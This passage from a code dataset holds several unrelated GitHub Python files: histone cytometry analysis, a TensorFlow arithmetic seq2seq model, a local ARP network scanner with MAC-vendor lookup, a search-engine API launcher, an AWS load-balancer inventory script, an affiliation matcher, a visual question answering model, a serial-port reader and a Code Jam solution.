mudiff=np.mean(X1)-np.mean(X2)\n sd1=np.std(X1)\n sd2=np.std(X2)\n n1=len(X1)\n n2=len(X2)\n pooledSE = sqrt(sd1**2/n1 + sd2**2/n2)\n z = ((X1 - X2) - mudiff)/pooledSE\n pval = 2*(1 - norm.cdf(abs(z)))\n return round(pval, 4)\n\ndef statistic(dframe):\n return dframe.corr().loc[Var1,Var2]\n\n\ndef draw_umap(data,n_neighbors=15, min_dist=0.1, n_components=2, metric='euclidean', title=''\n ,cc=0):\n fit = umap.UMAP(\n n_neighbors=n_neighbors,\n min_dist=min_dist,\n n_components=n_components,\n metric=metric\n )\n u = fit.fit_transform(data);\n plt.figure(figsize=(6, 5))\n if n_components == 2:\n plt.scatter(u[:,0], u[:,1], c=cc,s=3,cmap=plt.cm.jet)\n plt.clim(-5,5)\n plt.colorbar()\n plt.title(title, fontsize=18)\n return u;\n\n#df=pd.read_csv(\"control.csv\")\n#dfmut=pd.read_csv(\"mutant.csv\")\ndir=\"/Users/ronguy/Dropbox/Work/CyTOF/Datasets/\"\nC15=pd.read_csv(dir+\"C06.csv\")\nC16=pd.read_csv(dir+\"C08.csv\")\n\n\n#C11=C11[(C11 != 0).all(1)]\n#C12=C12[(C12 != 0).all(1)]\n\n\n\nNamesAll=['H3',\n 'H3K36me3',\n 'H2B',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3.3',\n 'H3K64ac',\n 'H4',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n 'H3K27me3',\n 'H3K27M',\n 'H3K9me3',\n 
'pHistone H3 [S28]']\n\n\n\nplt.figure(figsize=(6, 5))\n\nGateColumns=['H3',\n 'H3K36me3',\n 'H2B',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3.3',\n 'H3K64ac',\n 'H4',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n 'H3K27me3',\n 'H3K27M',\n 'H3K9me3',\n 'pHistone H3 [S28]']\n\n\n \nC15=C15[(C15[['H3','H3.3','H4']]>5).all(axis=1)]\nC16=C16[(C16[['H3','H3.3','H4']]>5).all(axis=1)]\n\n\n\nC15=C15[(C15[GateColumns]>0).all(axis=1)]\nC16=C16[(C16[GateColumns]>0).all(axis=1)]\n\nC15=C15[GateColumns]\nC16=C16[GateColumns]\n\n\n\nC16_z=(C16 - C16.mean())/C16.std()\nC15_z=(C15 - C15.mean())/C15.std()\n\n\nC16_NO=C16[(C16_z<=5).all(axis=1)]\nC15_NO=C15[(C15_z<=5).all(axis=1)]\n\n\nC16=C16_NO\nC15=C15_NO\n\n\nsns.set_style({'legend.frameon':True})\n#CAll=CAll[CAll['clust'].isin([0,1])]\nd0=C15.std()/C15.mean()\nd1=C16.std()/C16.mean()\n\n\n\ndd0=np.log(d0.sort_values())\ndd1=np.log(d1.sort_values())\n\n# fig, ax = plt.subplots(figsize=(16,10), dpi= 80)\n# ax.hlines(y=dd0.index, xmin=-5, xmax=5, color='gray', alpha=0.7, \n# linewidth=1, linestyles='dashdot')\n\n# ax.scatter(y=dd0.index, x=dd0, s=50, c='blue', alpha=0.7,\n# label=\"C15\",)\n# ax.scatter(y=dd0.index, x=d1, s=50, c='green', alpha=0.7,\n# label=\"C16\",)\n# #ax.scatter(y=dd2.index, x=dd2, s=900*np.power(sz1,2), c='red', alpha=0.7,\n# # label=\"Cluster 2\",)\n# #ax.scatter(y=dd3.index, x=dd3, s=900*np.power(sz3,2), c='magenta', alpha=0.7,\n# # label=\"Cluster 3\",)\n\n\n\n# ax.vlines(x=0, ymin=0, ymax=len(dd0)-1, color='black', alpha=0.7, linewidth=2, linestyles='dotted')\n# plt.legend(fontsize=20,\n# facecolor='White', framealpha=1,frameon=True)\n\n# ax.set_title('$\\sigma$/$\\mu$', fontdict={'size':22})\n# ax.set_xlim(0, 12.5)\n\n# plt.show()\n\n\n\ndiffs=(dd1-dd0).sort_values(ascending=False) \n \nclrs = ['red' if x < 0 else 'green' for x in diffs]\n\nNMS=[\n 'H3K36me3',\n 'H3K4me3',\n# 'pHistone H2A.X [Ser139]',\n 'H3K36me2',\n 'H4K16Ac',\n 'H2AK119ub',\n 'H3K4me1',\n 'H3K64ac',\n 'H3K27ac',\n 'cleaved H3',\n 'H3K9ac',\n# 'H3K27me3',\n 'H3K9me3',\n# 'pHistone H3 [S28]'\n ]\n\ndiffs=diffs[NMS]\ndiffs=diffs.sort_values(ascending=False) \nclrs = ['red' if x < 0 else 'green' for x in diffs]\n\n# Draw plot\nfig, ax = plt.subplots(figsize=(16,10), dpi= 80)\nplt.hlines(y=diffs.index, xmin=0, xmax=diffs, color=clrs, alpha=0.4, linewidth=5)\n\n# Decorations\nplt.gca().set(ylabel='$Marker$', xlabel='$Difference$')\n#plt.yticks(df.index, df.cars, fontsize=12)\nplt.title('$log(\\sigma/\\mu)$ Mutant - WT', fontdict={'size':20})\nplt.grid(linestyle='--', alpha=0.5)\nplt.show()\n\n\n\n\n\ndd0=np.log(d0[NMS].sort_values())\ndd1=np.log(d1[NMS].sort_values())\n\njet = cm = plt.get_cmap('jet') \ncNorm = colors.Normalize(vmin=0, vmax=len(dd0))\nscalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet)\nprint(scalarMap.get_clim())\n\n\n\n\n\nfig, ax = plt.subplots(figsize=(16,10), dpi= 80)\nax.hlines(y=[0,1], xmin=0, xmax=6, color='gray', alpha=0.7, \n linewidth=1, linestyles='dashdot')\nfor count, value in enumerate(dd0.index):\n print(count)\n colorVal = scalarMap.to_rgba(count)\n ax.scatter(y=1, x=dd0[NMS][value], s=50, color=colorVal, alpha=0.7,label=value)\n ax.scatter(y=0, x=dd1[value], s=50, color=colorVal, alpha=0.7)\n ax.plot([dd0[value],dd1[value]],[1,0],color=colorVal,linewidth=2)\n\nax.set_xlim(-1.5,0)\nplt.yticks([0,1], ['C16','C15'], rotation='horizontal') \nplt.legend()\nplt.title('$log(\\sigma/\\mu)$')\n\nC15=C15.assign(type='WT'); 
\nC16=C16.assign(type='Mutant');\nCAll=C15.append(C16)","repo_name":"ronguy-huji/CyTOF-K27M","sub_path":"C15_C16_Variances copy.py","file_name":"C15_C16_Variances copy.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42742132576","text":"import tensorflow as tf\nimport time\nimport numpy as np\nimport expression_generator\nimport os\n\nepochs = 10000\nbatch_size = 128\nlearning_rate = 1e-3\n\ntf.reset_default_graph()\nsess = tf.InteractiveSession()\n\nnodes = 128\nembed_size = 20\nvocab_size = expression_generator.vocab_size\n\ninput_length = 4\noutput_length = 3\n\ninputs = tf.placeholder(tf.int32, (None, input_length), name = 'inputs')\noutputs = tf.placeholder(tf.int32, (None, None), name = 'output')\ntargets = tf.placeholder(tf.int32, (None, None), name = 'targets')\n\nwith tf.variable_scope(\"embeding\"):\n input_embedding = tf.Variable(tf.random_uniform((vocab_size, embed_size), -1.0, 1.0), name='encoder_embedding')\n output_embedding = tf.Variable(tf.random_uniform((vocab_size, embed_size), -1.0, 1.0), name='decoder_embedding')\n input_embed = tf.nn.embedding_lookup(input_embedding, inputs)\n output_embed = tf.nn.embedding_lookup(output_embedding, outputs)\n\nwith tf.variable_scope(\"encoder\"):\n encoder = tf.contrib.rnn.BasicLSTMCell(nodes)\n _, last_state = tf.nn.dynamic_rnn(encoder, inputs=input_embed, dtype=tf.float32)\n\nwith tf.variable_scope(\"decoder\"):\n decoder = tf.contrib.rnn.LSTMCell(nodes)\n dec_outputs, _ = tf.nn.dynamic_rnn(decoder, inputs=output_embed, initial_state=last_state)\n logits = tf.contrib.layers.fully_connected(dec_outputs, num_outputs=vocab_size, activation_fn=None)\n\nwith tf.variable_scope(\"loss\"):\n loss = tf.contrib.seq2seq.sequence_loss(logits, targets, tf.ones([batch_size, output_length]))\n optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(loss)\n\n\nsaver = tf.train.Saver()\nsess.run(tf.global_variables_initializer())\n\nwriter = tf.summary.FileWriter(\"output\", sess.graph)\n\nstep = epochs\ncheckpoint = tf.train.get_checkpoint_state(\"model\")\nif checkpoint and checkpoint.model_checkpoint_path:\n s = saver.restore(sess,checkpoint.model_checkpoint_path)\n print(\"Loaded model:\", checkpoint.model_checkpoint_path)\n step = int(os.path.basename(checkpoint.model_checkpoint_path).split('-')[1])\nelse:\n print(\"Can't find model\")\n\n\n try:\n start_time = time.time()\n for i in range(epochs+1):\n epoch_start_time = time.time()\n batch_x, batch_y = expression_generator.get_data(batch_size)\n _, batch_loss, batch_logits = sess.run([optimizer, loss, logits],\n feed_dict ={\n inputs: batch_x,\n outputs: [[expression_generator.EOS] + sequence for sequence in batch_y],\n targets: [sequence + [expression_generator.EOS] for sequence in batch_y]\n })\n\n if i % 100 == 0:\n print('Epoch: ' + str(i) + \", Loss: \" + str(batch_loss) + \", Epoch duration: \" + str(time.time() - epoch_start_time) + \", Total time: \" + str(time.time() - start_time))\n saver.save(sess, \"./model/model.ckpt\", global_step=i)\n except KeyboardInterrupt:\n print('training interrupted')\n\n#TEST\n\nNUM_TEST = 1000\nsuccess = 0\nfail = 0\n\nfor _ in range(NUM_TEST):\n x, y = expression_generator.get_data(1)\n decoder_input = np.zeros((len(x), 1)) + expression_generator.START_TOKEN\n result = []\n for i in range(3):\n batch_logits = sess.run(logits,\n feed_dict={inputs: x,\n outputs: decoder_input})\n prediction = batch_logits[:, -1].argmax(axis=-1)\n 
result.append(prediction.tolist())\n        decoder_input = np.hstack([decoder_input, prediction[:, None]])\n\n    y = expression_generator.array2expression(y)\n    result = expression_generator.array2expression(result)\n    try:\n        if int(result) == int(y):\n            success += 1\n        else:\n            fail += 1\n            print(\"_______________\")\n            print(\"X\")\n            print(expression_generator.array2expression(x))\n            print(\"Y\")\n            print(y)\n            print(\"Pred\")\n\n            print(result)\n    except:\n        fail += 1\n        print(result)\n\nprint(str(success/NUM_TEST * 100) + \"% success rate\")\n\n#VISUAL TESTS\nfor _ in range(10):\n    print(\"_______________\")\n\n    x, y = expression_generator.get_data(1)\n\n    print(x)\n\n    print(\"X\")\n    print(expression_generator.array2expression(x))\n\n    decoder_input = np.zeros((len(x), 1)) + expression_generator.START_TOKEN\n    result = []\n    for i in range(3):\n        batch_logits = sess.run(logits,\n                        feed_dict={inputs: x,\n                                 outputs: decoder_input\n                                 })\n        prediction = batch_logits[:, -1].argmax(axis=-1)\n        result.append(prediction.tolist())\n        print(\"Prediction: \" + str(prediction))\n        decoder_input = np.hstack([decoder_input, prediction[:, None]])\n\n    y = expression_generator.array2expression(y)\n    result = expression_generator.array2expression(result)\n\n\n    print(\"Y\")\n    print(y)\n    print(\"Pred\")\n\n    print(result)\n\nwriter.close()\n\n","repo_name":"ThierryJudge/MathExpressionRNN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"13021258629","text":"from scapy.all import ARP, Ether, srp\nimport requests\n\ndef scan_network(ip):\n    arp = ARP(pdst=ip)\n    ether = Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n    packet = ether/arp\n    result = srp(packet, timeout=3, verbose=0)[0]\n    devices = []\n    for sent, received in result:\n        vendor = get_vendor(received.hwsrc)\n        devices.append({'ip': received.psrc, 'mac': received.hwsrc, 'vendor': vendor})\n    return devices\n\ndef get_vendor(mac_address):\n    url = f\"https://api.macvendors.com/{mac_address}\"\n    response = requests.get(url)\n    if response.status_code != 200:\n        return \"N/A\"\n    return response.content.decode()\n\ndevices = scan_network('192.168.1.0/24')\nfor device in devices:\n    print(f\"IP: {device['ip']} MAC: {device['mac']} Vendor: {device['vendor']}\")\n","repo_name":"FreddyOjeda/proyecto_de_grado","sub_path":"bing_2.py","file_name":"bing_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"24560070058","text":"from app.routes import add_routes\nfrom app.search_engine import Search_engine\nfrom app import app\nimport configparser\nimport argparse\nimport nltk\n\nif __name__ == '__main__':\n\n    try:\n        print('## Downloading extra packages...')\n        nltk.download('punkt')\n        nltk.download('stopwords')\n        nltk.download('rslp')\n        print('## Done...\\n')\n    except:\n        print('## Error downloading the packages!\\n')\n        exit(0)\n\n    print('## Applying settings and instantiating tools...')\n\n    # Path to the database\n    base_dir = '/app/base_de_dados/'\n    # Treatments to apply to the corpus\n    tratement = ['alpha_num', 'lower_case', 'stop_words', 'steamming']\n\n\n    print('## Instantiating the engine...')\n    search_engine = Search_engine(base_dir, tratement)\n    print('## Starting database processing. 
This may take a while...')\n    search_engine.proccess_database()\n\n    print('## Starting the API...')\n    app = app\n    add_routes(app, search_engine)\n    config = configparser.ConfigParser()\n    config.read('config/configuration.cfg')\n    app.run(\n        host=config.get('general', 'host',fallback='0.0.0.0'),\n        port=config.get('general', 'port',fallback='8000'),\n        debug=False\n    )","repo_name":"phytter/search-engine-server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23571933527","text":"from ..aws import region_names\nfrom app.es import client\n\nELB_NAME = {\n    'elb': 'LoadBalancerDescriptions',\n    'elbv2': 'LoadBalancers',\n}\n\ndef get_load_balancers(session):\n    for elb_version in ('elb', 'elbv2'):\n        for region_name in region_names:\n            client = session.client(elb_version, region_name=region_name)\n            paginator = client.get_paginator('describe_load_balancers')\n            for page in paginator.paginate():\n                for load_balancer in page[ELB_NAME[elb_version]]:\n                    yield (elb_version, region_name, load_balancer)\n\n\ndef import_elb_infos(key):\n    session = key.get_boto_session()\n    for version, region, lb in get_load_balancers(session):\n        doc = {\n            'linked_account_id': key.get_aws_user_id(),\n            'name': lb['LoadBalancerName'],\n            'region': region,\n        }\n        if version == 'elb':\n            doc['instances'] = ' '.join([instance['InstanceId'] for instance in lb['Instances']])\n        elif version == 'elbv2':\n            doc['instances'] = ''\n        client.index(index='awselbinfo', doc_type='a_ws_el_binfo', body=doc, ttl='18h', timeout='120s', request_timeout=120)\n","repo_name":"trackit/trackit-legacy","sub_path":"api/files/api/app/aws/elb.py","file_name":"elb.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"41860388105","text":"import requests\nimport fasttext\nfrom predictor import Predictor\nfrom urllib.parse import quote\n\nPREDICTOR = Predictor('../models/')\n\ndef query_affiliation(affiliation):\n    chosen_id = None\n    affiliation_encoded = quote(affiliation)\n    url = f\"https://api.ror.org/organizations?affiliation={affiliation_encoded}\"\n    r = requests.get(url)\n    if r.ok:\n        api_response = r.json()\n        results = api_response['items']\n        if results != []:\n            for result in results:\n                if result['chosen']:\n                    chosen_id = result['organization']['id']\n    return chosen_id\n\n\ndef ensemble_match(affiliation, confidence=0.8):\n    fasttext_prediction = PREDICTOR.predict_ror_id(affiliation, confidence)\n    if fasttext_prediction is not None:\n        return fasttext_prediction\n    else:\n        affiliation_prediction = query_affiliation(affiliation)\n        if affiliation_prediction is not None:\n            return affiliation_prediction\n\n\nif __name__ == '__main__':\n    print(ensemble_match('Department of Engineering, University of Michigan, Ann Arbor, MI 48103'))","repo_name":"adambuttrick/ensemble_matching","sub_path":"ensemble_matching.py","file_name":"ensemble_matching.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"26160383400","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom torch.nn.utils import rnn as rnn_utils\nfrom attention import MultiHeadAttention\nfrom transformers import CamembertModel, CamembertConfig, FlaubertConfig, FlaubertModel, \\\n    XLMRobertaConfig, 
XLMRobertaModel, BertModel, BertConfig\n\n\nclass CoAttention(nn.Module):\n    \"\"\"Co-Attention Architecture\"\"\"\n\n    def __init__(self, ques_enc_params, img_enc_params, K, mlp_dim=512):\n        super().__init__()\n        self.hidden_dim = ques_enc_params['hidden_dim']\n        self.image_encoder = ImageCoAttentionEncoder(**img_enc_params)\n        self.question_encoder = QuestionCoAttentionEncoder.create(**ques_enc_params)\n        self.co_attention = CoAttentionLayer(self.hidden_dim)\n        self.mlp_classify = FeedForward(self.hidden_dim, mlp_dim, K)\n\n    def forward(self, x_img, x_input_id, x_input_mask, x_input_type_ids):\n        # Word features\n        x_word = self.question_encoder(x_input_id, x_input_mask, x_input_type_ids)  # [batch, max_seq_len, hidden_dim]\n        # Question Features ([word])\n        x_ques_features = [x_word]  # [batch, max_seq_len, hidden_dim]\n        # Image Features\n        x_img_features = self.image_encoder(x_img)  # [batch, spatial_locs, hidden_dim]\n        # Attention weighted image & question features\n        x_img_attn, x_ques_attn = self.co_attention(x_img_features, x_ques_features)  # [B, hid_dim], [B, hid_dim]\n        # Predict Answer (logits)\n        x_logits = self.mlp_classify(x_img_attn, x_ques_attn)  # [batch_size, K]\n\n        return x_logits\n\n\nclass ImageCoAttentionEncoder(nn.Module):\n\n\n    def __init__(self, is_require_grad):\n        super(ImageCoAttentionEncoder, self).__init__()\n\n        self.is_require_grad = is_require_grad\n\n        # Resnet Encoder\n        self.resnet_encoder = self.build_resnet_encoder()\n\n        # Flatten the feature map grid [B, D, H, W] --> [B, D, H*W]\n        self.flatten = nn.Flatten(start_dim=2, end_dim=3)\n\n\n    def forward(self, x_img):\n        x_feat_map = self.resnet_encoder(x_img)\n\n        # Flatten (16 x 16 x 2048) --> (16*16, 2048)\n        x_feat = self.flatten(x_feat_map)\n\n        x_feat = x_feat.permute(0, 2, 1)  # [batch_size, spatial_locs, 2048]\n\n        return x_feat\n\n    def build_resnet_encoder(self):\n        \"\"\"\n        Given Resnet backbone, build the encoder network from all layers except the last 2 layers.\n\n        :return: model (nn.Module)\n        \"\"\"\n        resnet = models.resnet152(pretrained=True)\n\n        modules = list(resnet.children())[:-2]\n\n        resnet_encoder = nn.Sequential(*modules)\n\n        for param in resnet_encoder.parameters():\n            param.requires_grad = self.is_require_grad\n\n        return resnet_encoder\n\n\n\nclass QuestionCoAttentionEncoder(nn.Module):\n    \"\"\"\n    Encode question phrases using BERT based embeddings\n    and apply a BiLSTM to encode the question.\n    \"\"\"\n    def __init__(self, config, model, lstm,attn):\n        super(QuestionCoAttentionEncoder, self).__init__()\n\n        self.configuration = config\n        self.model = model\n        self.lstm = lstm\n        self.attn = attn\n        if self.configuration['mode'] == \"weighted\":\n            self.bert_weights = torch.nn.Parameter(torch.FloatTensor(12, 1))\n            self.bert_gamma = torch.nn.Parameter(torch.FloatTensor(1, 1))\n        self.init_weights()\n\n    def init_weights(self):\n        if self.configuration[\"mode\"] == \"weighted\":\n            torch.nn.init.xavier_normal(self.bert_gamma)\n            torch.nn.init.xavier_normal(self.bert_weights)\n\n\n    @classmethod\n    def create(cls,\n               model_type ='camem',\n               model_name =\"camembert-base\",\n               embedding_size = 768,\n               hidden_dim = 512,\n               rnn_layers = 1,\n               lstm_dropout = 0.5,\n               device=\"cuda\",\n               mode=\"weighted\",\n               key_dim=64,\n               val_dim=64,\n               num_heads=3,\n               attn_dropout=0.3,\n               self_attention=False,\n               is_require_grad=False):\n        configuration = {\n            'model_type' : model_type,\n            \"model_name\": model_name,\n            \"device\": device,\n            \"mode\": mode,\n            \"self_attention\":self_attention,\n            \"is_freeze\": is_require_grad\n        }\n\n        if 'camem' in model_type:\n            config_bert = 
CamembertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = CamembertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'flaubert' in model_type:\n config_bert = FlaubertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = FlaubertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'XLMRoberta' in model_type:\n config_bert = XLMRobertaConfig.from_pretrained(model_name, output_hidden_states=True)\n model = XLMRobertaModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'M-Bert' in model_type:\n config_bert = BertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = BertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n\n lstm = BiLSTM.create(embedding_size=embedding_size, hidden_dim=hidden_dim, rnn_layers=rnn_layers, dropout=lstm_dropout)\n\n attn = MultiHeadAttention(key_dim, val_dim, hidden_dim, num_heads, attn_dropout)\n model.train()\n self = cls(model=model, config=configuration, lstm=lstm,attn=attn)\n # if is_freeze:\n self.freeze()\n\n return self\n\n def freeze(self):\n \n for param in self.model.parameters():\n param.requires_grad = self.configuration['is_freeze']\n\n def forward(self, x_input_id, x_input_mask, x_input_type_ids):\n\n if 'camem' in self.configuration['model_type']:\n encoded_layers, _, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n elif 'flaubert' in self.configuration['model_type']:\n encoded_layers, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n elif 'XLMRoberta' in self.configuration['model_type']:\n encoded_layers,_, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n elif 'M-Bert' in self.configuration['model_type']:\n encoded_layers,_, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n\n\n if self.configuration[\"mode\"] == \"weighted\":\n encoded_embeddings = torch.stack([a * b for a, b in zip(all_layer_embeddings, self.bert_weights)])\n input_embeddings = self.bert_gamma * torch.sum(encoded_embeddings, dim=0)\n else:\n input_embeddings = encoded_layers[-1, :, :, :]\n output, _ = self.lstm.forward(input_embeddings, x_input_mask)\n if self.configuration['self_attention']:\n output, _ = self.attn(output, output, output, None)\n return output\n\n\nclass BiLSTM(nn.Module):\n\n def __init__(self, embedding_size=768, hidden_dim=512, rnn_layers=1, dropout=0.5):\n super(BiLSTM, self).__init__()\n self.embedding_size = embedding_size\n self.hidden_dim = hidden_dim\n self.rnn_layers = rnn_layers\n self.dropout = nn.Dropout(dropout)\n self.lstm = nn.LSTM(\n embedding_size,\n hidden_dim // 2,\n rnn_layers, batch_first=True, bidirectional=True)\n\n def forward(self, input_, input_mask):\n length = input_mask.sum(-1)\n sorted_lengths, sorted_idx = torch.sort(length, descending=True)\n input_ = input_[sorted_idx]\n packed_input = rnn_utils.pack_padded_sequence(input_, sorted_lengths.data.tolist(), batch_first=True)\n self.lstm.flatten_parameters()\n output, (hidden, _) = self.lstm(packed_input)\n padded_outputs = rnn_utils.pad_packed_sequence(output, batch_first=True)[0]\n _, reversed_idx = torch.sort(sorted_idx)\n return padded_outputs[reversed_idx], hidden[:, reversed_idx]\n\n @classmethod\n 
def create(cls, *args, **kwargs):\n        return cls(*args, **kwargs)\n\n\n\nclass CoAttentionLayer(nn.Module):\n    \"\"\"\n    Implements Co-Attention mechanism\n    given image & question features.\n    \"\"\"\n    def __init__(self, hidden_dim):\n        super().__init__()\n        self.hidden_dim = hidden_dim\n        # Affinity layer\n        self.W_b = nn.Linear(self.hidden_dim, self.hidden_dim)\n        # Attention layers\n        self.W_v = nn.Linear(self.hidden_dim, self.hidden_dim)\n        self.W_q = nn.Linear(self.hidden_dim, self.hidden_dim)\n        self.w_v = nn.Linear(self.hidden_dim, 1)\n        self.w_q = nn.Linear(self.hidden_dim, 1)\n\n    def forward(self, x_img, x_ques_hierarchy):\n        img_feats = []\n        quest_feats = []\n\n        for x_ques in x_ques_hierarchy:\n            Q = x_ques  # [batch_size, max_seq_len, hidden_dim]\n            V = x_img.permute(0, 2, 1)  # [batch_size, hidden_dim, spatial_locs]\n\n            # Affinity matrix\n            C = F.tanh(torch.bmm(Q, V))  # [batch_size, max_seq_len, spatial_locs]\n            ##Tranpose the image spatial matrix\n            V = V.permute(0, 2, 1)  # [batch_size, spatial_locs, hidden_dim]\n\n            H_v = F.tanh(self.W_v(V) +  # [batch_size, spatial_locs, hidden_dim]\n                         torch.bmm(C.transpose(2, 1), self.W_q(Q)))\n\n            H_q = F.tanh(self.W_q(Q) +  # [batch_size, max_seq_len, hidden_dim]\n                         torch.bmm(C, self.W_v(V)))\n\n            # Attention weights\n            a_v = F.softmax(self.w_v(H_v), dim=1)  # [batch_size, spatial_locs, 1]\n            a_q = F.softmax(self.w_q(H_q), dim=1)  # [batch_size, max_seq_len, 1]\n\n            # Compute attention-weighted features\n            v = torch.sum(a_v * V, dim=1)  # [batch_size, hidden_dim]\n            q = torch.sum(a_q * Q, dim=1)  # [batch_size, hidden_dim]\n\n            img_feats.append(v)\n            quest_feats.append(q)\n\n        return img_feats, quest_feats  # 3*[batch, hidden_dim], 3*[batch, hidden_dim]\n\n\nclass FeedForward(nn.Module):\n    \"\"\"\n    Feed forward neural network that concatenates the image and word attention weights\n    \"\"\"\n    def __init__(self, hidden_dim, mlp_dim, K):\n        super().__init__()\n\n        self.W_w = nn.Linear(hidden_dim, mlp_dim)\n        # self.batch_norm = nn.BatchNorm1d(hidden_dim)\n        self.W_h = nn.Linear(mlp_dim, K)\n\n    def forward(self, x_img_feats, x_ques_feats):\n        q_w = x_ques_feats[0]  # [batch_size, hidden_dim]\n        v_w = x_img_feats [0]  # [batch_size, hidden_dim]\n        h_w = F.tanh(self.W_w(q_w + v_w))  # [batch_size, mlp_dim]\n        # Final answer (classification logit)\n        # logit = self.W_h(self.batch_norm(h_w))  # [batch_size, K]\n\n        logit = self.W_h(h_w)\n        return logit\n\n","repo_name":"VarnithChordia/Multimodal_Classification_Co_Attention","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12177,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"}
{"seq_id":"23403125391","text":"import math\r\n\r\ndef sqr(i):\r\n    return i*i\r\n\r\nN, M, K = 0, 0, 0\r\n\r\ndef factor(x):\r\n    global N\r\n    rest = x\r\n    result = []\r\n    for i in reversed(range(2, M + 1)):\r\n        while (rest % i) == 0:\r\n            rest = rest // i\r\n            result.append(i)\r\n        if rest == 1:\r\n            break\r\n    \r\n    return result\r\n\r\ndef mergeRes(r, append):\r\n    remainder = r[:]\r\n    result = r[:]\r\n    for i in append:\r\n        if i in remainder:\r\n            remainder.remove(i)\r\n        else:\r\n            result.append(i)\r\n    \r\n    return result\r\n    \r\n    \r\ndef solveCase(c):\r\n    global N, M, K\r\n\r\n    result = [] # [0 for i in range(1, K)]\r\n    \r\n    for x in c:\r\n        append = factor(x)\r\n        result = mergeRes(result, append)\r\n        print('x,a,c', x, append, result)\r\n    \r\n    l = len(result)\r\n    if l < N:\r\n        result.extend([2 for i in range(0, N - l)])\r\n    \r\n    string = ''\r\n    for i in result:\r\n        string = string + str(i)\r\n    print(string)\r\n    
\r\n    return string\r\n\r\n\r\n\r\ndef solve(sourceFile, resultFile):\r\n    global N, M, K\r\n\r\n    s = open(sourceFile)\r\n    res = open(resultFile, 'w')\r\n\r\n    t = int(s.readline())\r\n    \r\n    r, N, M, K = [int(i) for i in s.readline().split()]\r\n    print('n,k,m', N, K, M)\r\n\r\n    header = 'Case #1: \\n'\r\n    res.write(header)\r\n    for n in range(1, r + 1):\r\n        string = s.readline()\r\n        case = [int(i) for i in string.split()]\r\n        res.write(solveCase(case) + '\\n')\r\n    \r\n    return\r\n    \r\ndef main():\r\n    source = 'C-small-1-attempt1.in'\r\n    result = source + '.result.txt'\r\n    solve(source, result)\r\n    return\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_122/167.py","file_name":"167.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"750538489","text":"# import serial\r\n\r\n# ser = serial.Serial('COM5', 9600, timeout=0.050)\r\n\r\n# while 1:\r\n#     while ser.in_waiting:\r\n#         data_in = ser.readline()\r\n#         print (data_in)\r\n\r\nimport serial\r\nfrom time import sleep\r\n\r\nser = serial.Serial (\"COM5\", 9600) #Open port with baud rate\r\nwhile True:\r\n    received_data = ser.read() #read serial port\r\n    sleep(0.03)\r\n    data_left = ser.inWaiting() #check for remaining byte\r\n    received_data += ser.read(data_left)\r\n    print (received_data) #print received data\r\n    # ser.write(received_data) ","repo_name":"zeynabT/cansat","sub_path":"uart/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
